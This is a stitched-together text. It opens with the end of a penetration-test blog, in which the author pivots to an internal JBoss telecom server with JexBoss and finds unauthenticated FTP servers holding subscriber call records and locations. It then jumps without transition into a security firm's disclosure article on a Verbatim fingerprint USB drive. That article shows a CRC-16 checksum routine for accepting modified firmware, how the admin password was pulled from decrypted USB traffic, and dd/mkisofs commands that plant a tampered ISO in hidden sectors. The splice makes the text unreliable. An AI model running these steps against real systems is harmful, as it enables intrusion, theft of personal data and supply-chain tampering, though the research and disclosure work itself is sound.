There’s another JBoss instance used internally? 🤣
Exploiting Internal Network Service
So there was another JBoss instance running on port 80/tcp on an internal IP 10.x.x.x. All I had to do was use proxychains and run JexBoss once more against the internal IP (I could also have used the -P switch in JexBoss to provide the proxy address).
This was an easy win: the internal JBoss server was also vulnerable, so I was able to get RCE from my pivot machine (the initial foothold) on the next internal JBoss server 😎
Awesome! Now, when I got the shell, I used the following command to list all the files and directories under /home/<user> in a structured way:
cd /home/<user>; find . -print | sed -e "s;[^/]*/;|_ _ _ _;g;s;_ _ _ _|; |;g" 2>&1
In the output, I found an interesting .bat file — ss7-cli.bat (The script configures the SS7 Management Shell Bootstrap Environment)
In the same Internal JBoss server, a Visitor Location Register (VLR) console client application was also stored to access the VLR information from the database.
To monitor the SS7/ISDN links, decode the protocol standards, and generate CDRs for billing purposes, a console client is required to interact with the system.
You may ask why an SS7 client application was running on JBoss. One word: "Mobicents"
Mobicents
Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia
Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org
So it looks like the internal JBoss server was running a VoIP gateway application (SIP server) that interacted with the Public Switched Telephone Network (PSTN) using SS7. (It was tiring to work out the internal network structure without any kind of network architecture diagram.)
Going beyond
While doing some more recon on the internal JBoss application running the VoIP gateway, I found that there were internal gateway servers, CDR backup databases, FTP servers storing backup configurations of the SS7 and USSD protocols, etc. (Thanks to /etc/hosts.)
From the hosts file, I found a lot of FTP servers, which at first I didn't think were important, but then I found the CDR-S and CDR-L FTP servers. These servers stored the backup CDR S-Records and CDR L-Records respectively.
You can read more about these records from here: CDR S-Records: Page 157 & CDR L-Records: Page 168
Using Metasploit, I quickly scanned these FTP servers and checked their authentication status.
The FTP servers were accessible without any kind of authentication 🤣🤣
Maybe the FTP servers were used for internal use by VoIP applications or something else but still, a win is a win!
Because of this, I was able to get to the CDR backups, stored in XLS format, for almost all mobile subscribers. (Sorry, but I had to redact a lot, as this was really critical information.)
In the screenshot, the A Number is where the call originated (the caller) and the B Number is the dialed number. The CDR record also included the IMSI & IMEI numbers, call start/end date & timestamp, call duration, call type (incoming or outgoing), service type (the telecom service companies), Cell ID-A (the cell tower from which the call originated), and Location-A (the location of the caller).
Once our team notified the client about our access to the CDR backup servers, the client asked us to end the engagement there. I guess it was too much for them to take in 🤣
I hope you guys enjoyed it!
Promotion Time!
If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)
In the second article of this series, SySS IT security expert Matthias Deeg presents security vulnerabilities found in another crypto USB flash drive with AES hardware encryption.
Introduction
In this second part of the blog series, the research results concerning the secure USB flash drive Verbatim Executive Fingerprint Secure SSD, shown in the following figures, are presented.
Front view of the secure USB flash drive Verbatim Executive Fingerprint Secure
The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints.
The manufacturer describes the product as follows:
The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption.
The test methodology used for this research project, the considered attack surface and attack scenarios, and the security properties expected of a secure USB flash drive were already described in the first part of this article series.
Hardware Analysis
When analyzing a hardware device like a secure USB flash drive, the first step is to take a closer look at the hardware design. After opening the case of the Verbatim Executive Fingerprint Secure SSD, its printed circuit board (PCB) can be removed. The following figure shows the front side of the PCB and the SSD in M.2 form factor.
PCB front side of Verbatim Executive Fingerprint Secure SSD
Here, we can already see the first three main components of this device:
NAND flash memory chips
a memory controller (Maxio MAS0902A-B2C)
a SPI flash memory chip (XT25F01D)
On the back side of the PCB, the following further three main components can be found:
a USB-to-SATA bridge controller (INIC-3637EN)
a fingerprint sensor controller (INIC-3782N)
a fingerprint sensor
PCB back side of Verbatim Executive Fingerprint Secure SSD
The Maxio memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor. This SSD can be read and written using another SSD enclosure supporting this form factor, which was very useful for different security tests.
By taking a closer look at the encrypted data, obvious patterns could be seen, as the following hexdump illustrates:
# hexdump -C /dev/sda
00000000 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
000001b0 99 e8 74 12 35 1f 1b 3b 77 12 37 6b 82 36 87 cf |..t.5..;w.7k.6..|
000001c0 fa bf 99 9e 98 f7 ba 96 ba c6 46 3a e5 bc 15 55 |..........F:...U|
000001d0 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
000001f0 92 78 15 87 cd 83 76 30 56 dd 00 1e f2 b3 32 84 |.x....v0V.....2.|
00000200 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
00100000 1e c0 fa 24 17 d9 4b 72 89 44 20 3b e4 56 99 32 |...$..Kr.D ;.V.2|
00100010 d8 65 93 7c 37 aa 8f 59 5e ec f1 e7 e6 9b de 9e |.e.|7..Y^.......|
[...]
The * in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times; the address column shows where the repetition ends. For example, the 16 bytes 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 fill the first 432 (0x1b0) bytes starting at address 0x00000000, i.e. the same 16-byte block repeated 27 times, and the same block is repeated twice more (32 bytes) starting at address 0x000001d0.
Seeing such repeating byte sequences in encrypted data is not a good sign, as we already know from part one of this series.
By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This looks like a block cipher with a 16-byte block size used in Electronic Codebook (ECB) mode, for example AES-256-ECB.
For some data, the lack of the cryptographic property called diffusion in this mode of operation can leak sensitive information even in encrypted form. A famous illustration of this issue is a bitmap image of Tux, the Linux penguin, and its ECB-encrypted version, shown in the following figure.
This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-010 and was assigned the CVE ID CVE-2022-28382.
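The repeated-ciphertext symptom is easy to test for programmatically. The following sketch (plain stdlib Python over an in-memory buffer; how you read the device image is up to you) counts 16-byte blocks that occur more than once, which modes like CBC or XTS would make vanishingly unlikely for typical data:

```python
from collections import Counter

def duplicate_blocks(data, block_size=16):
    """Map the hex of every block occurring more than once to its count."""
    usable = len(data) - len(data) % block_size
    blocks = [data[i:i + block_size] for i in range(0, usable, block_size)]
    return {blk.hex(): n for blk, n in Counter(blocks).items() if n > 1}

# The block seen at the top of the hexdump, repeated as on the real drive:
sample = bytes.fromhex("7ca1eb7d4e391eb19bc8c6867df3dd70") * 27
print(duplicate_blocks(sample))
```

Running this over a freshly formatted (mostly-zero) drive image immediately reveals whether an ECB-like mode is in use.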
Firmware Analysis
The SPI flash memory chip (XT25F01D) of the Verbatim Executive Fingerprint Secure SSD contains the firmware for the USB-to-SATA bridge controller Initio INIC-3637EN. The content of this SPI flash memory chip could be extracted using the universal programmer XGecu T56.
When analyzing the firmware, it could be found out that the firmware validation only consists of a simple CRC-16 check using XMODEM CRC-16. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip.
For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.
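The XMODEM variant of CRC-16 that the firmware check relies on is straightforward to reimplement. The following sketch shows only the checksum routine; where the firmware image stores the checksum is device-specific, so the patching step is left out:

```python
def crc16_xmodem(data: bytes) -> int:
    """CRC-16/XMODEM: polynomial 0x1021, init 0x0000, no reflection, no final XOR."""
    crc = 0x0000
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x1021) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc

# Standard check value for this CRC variant:
print(hex(crc16_xmodem(b"123456789")))  # 0x31c3
```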
Such modified firmware with a correct checksum then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called supply chain attack while the device is still on its way to its legitimate user.
An attacker with temporary physical access during shipping could program modified firmware onto the Verbatim Executive Fingerprint Secure SSD which, for example, always uses an attacker-controlled AES key for the data encryption. If the attacker later gains access to the USB drive, he can simply decrypt all contained user data.
This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-011 and was assigned the CVE ID CVE-2022-28383.
Protocol Analysis
The hardware design of the Verbatim Executive Fingerprint Secure SSD allowed for sniffing the serial communication between the fingerprint sensor controller (INIC-3782N) and the USB-to-SATA bridge controller (INIC-3637EN).
The following Figure exemplarily shows exchanged data when unlocking the device with a correct fingerprint. The actual communication is bidirectional and different data packets are exchanged during an unlocking process.
Sniffed serial communication when unlocking with a correct fingerprint shown in logic analyzer
In the course of this research project, no further time was spent to analyze the used proprietary protocol between the fingerprint sensor controller and the USB-to-SATA bridge controller, as a simpler way could be found to attack this device, which is described in the next section.
For the biometric authentication, a fingerprint sensor and a specific microcontroller (INIC-3782N) are used. Unfortunately, no public information about the INIC-3782N could be found, like data sheets or programming manuals.
For the registration of fingerprints, a client software (available for Windows or macOS) is used. The client software also supports a password-based authentication for accessing the administrative features and unlocking the secure disk partition containing the user data. The following Figure shows the login dialog of the provided client software for Windows.
Password-based authentication for administrator (VerbatimSecure.exe)
Software Analysis
The client software for Windows and macOS is provided on an emulated CD-ROM drive of the Verbatim Executive Fingerprint Secure SSD, as the following Figure exemplarily illustrates.
Emulated CD-ROM drive with client software
During this research project, only the Windows software, in the form of the executable VerbatimSecure.exe, was analyzed. This Windows client software communicates with the USB storage device via IOCTL_SCSI_PASS_THROUGH (0x4D004) commands using the Windows API function DeviceIoControl. However, simply analyzing the USB communication by setting a breakpoint on this API function in a software debugger like x64dbg was not possible, because the USB communication is AES-encrypted, as the following figure illustrates.
Encrypted USB communication via DeviceIoControl
Fortunately, the Windows client software is very analysis-friendly, as meaningful symbol names are present in the executable, for example concerning the used AES encryption for protecting the USB communication.
The following figure shows the AES (Rijndael) functions found in the Windows executable VerbatimSecure.exe.
AES functions of the Windows client software
Here, especially the two functions named CRijndael::Encrypt and CRijndael::Decrypt were of greater interest.
Furthermore, runtime analyses of the Windows client software using a software debugger like x64dbg could be performed without any issues. In doing so, it was possible to analyze the AES-encrypted USB communication in cleartext, as the following figure with a decrypted response from the USB flash drive illustrates.
Decrypted USB communication (response from device)
For securing the USB communication, AES with a hard-coded cryptographic key is used.
When analyzing the USB communication between the client software and the USB storage device, a very interesting and concerning observation was made: before the login dialog with the password-based authentication is even shown, there is already USB device communication involving sensitive data. And this sensitive data was nothing less than the currently set password for administrative access.
The following figure shows the corresponding decrypted USB device response with the current administrator password, S3cretP4ssw0rd in this example.
Decrypted USB device response containing the current administrator password
Thus, by accessing the decrypted USB communication of this specific IOCTL command, for instance using a software debugger as illustrated in the previous Figure, an attacker can instantly retrieve the correct plaintext password and thus unlock the device in order to gain unauthorized access to its stored user data.
In order to simplify the password retrieval process, a software tool named Verbatim Fingerprint Secure Password Retriever was developed that can extract the currently set password of a Verbatim Executive Fingerprint Secure SSD. The following figure shows the successful retrieval of the password S3cretP4ssw0rd that was previously set on this test device.
Successful attack using the developed Verbatim Fingerprint Secure Password Retriever
This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-009 with the assigned CVE ID CVE-2022-28387.
As described previously, the client software for administrative purposes is provided on an emulated CD-ROM drive. As my analysis showed, the content of this emulated CD-ROM drive is stored as an ISO-9660 image in hidden sectors of the USB drive, which can only be accessed using special IOCTL commands or by installing the drive in an external enclosure.
The following fdisk output shows the disk information when using the Verbatim enclosure, with a total of 1000179711 sectors.
# fdisk -l /dev/sda
Disk /dev/sda: 476.92 GiB, 512092012032 bytes, 1000179711 sectors
Disk model: Portable Drive
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xbfc4b04e
Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 1000171517 1000169470 476.9G c W95 FAT32 (LBA)
The next fdisk output shows the information for the same disk when using an external enclosure, where a total of 1000215216 sectors is available.
And in those 35505 hidden sectors of the tested 512 GB version of the Verbatim Executive Fingerprint Secure SSD, the ISO-9660 image with the content of the emulated CD-ROM drive is stored, as the following output illustrates.
# dd if=/dev/sda bs=512 skip=1000179711 of=cdrom.iso
35505+0 records in
35505+0 records out
18178560 bytes (18 MB, 17 MiB) copied, 0.269529 s, 67.4 MB/s
# file cdrom.iso
cdrom.iso: ISO 9660 CD-ROM filesystem data 'VERBATIMSECURE'
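The hidden-area arithmetic can be double-checked in a couple of lines: the difference between the sector counts reported by the two enclosures, times the 512-byte sector size, matches the dd transfer size exactly:

```python
SECTOR_SIZE = 512
sectors_external = 1000215216  # reported via the external enclosure
sectors_verbatim = 1000179711  # exposed by the Verbatim bridge controller

hidden_sectors = sectors_external - sectors_verbatim
hidden_bytes = hidden_sectors * SECTOR_SIZE
print(hidden_sectors, hidden_bytes)  # 35505 sectors, 18178560 bytes
```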
By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive. This malicious software may get executed by an unsuspecting victim when using the device at a later point in time.
The following figure exemplarily shows what an emulated CD-ROM drive manipulated by an attacker to contain malware may look like.
Emulated CD-ROM drive with attacker-controlled content
The following output exemplarily shows how a hacked ISO-9660 image was generated for testing this attack vector.
# mkisofs -o hacked.iso -J -R -V "VerbatimSecure" ./content
# dd if=hacked.iso of=/dev/sda bs=512 seek=1000179711
25980+0 records in
25980+0 records out
13301760 bytes (13 MB, 13 MiB) copied, 1.3561 s, 9.8 MB/s
As a thought experiment, this security issue concerning the data authenticity of the ISO-9660 image for the emulated CD-ROM partition could be exploited in an attack scenario one could call The Poor Hacker's Not-Targeted Supply Chain Attack, which consists of the following steps:
Buy vulnerable devices in online shops
Modify bought devices by adding malware
Return modified devices to vendors
Hope that returned devices are resold and not destroyed
Wait for potential victims to buy and use the modified devices
Profit?!
This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-013 with the assigned CVE ID CVE-2022-28385.
Summary
In this article, the research results leading to four different security vulnerabilities in the Verbatim Executive Fingerprint Secure SSD, listed in the following table, were presented.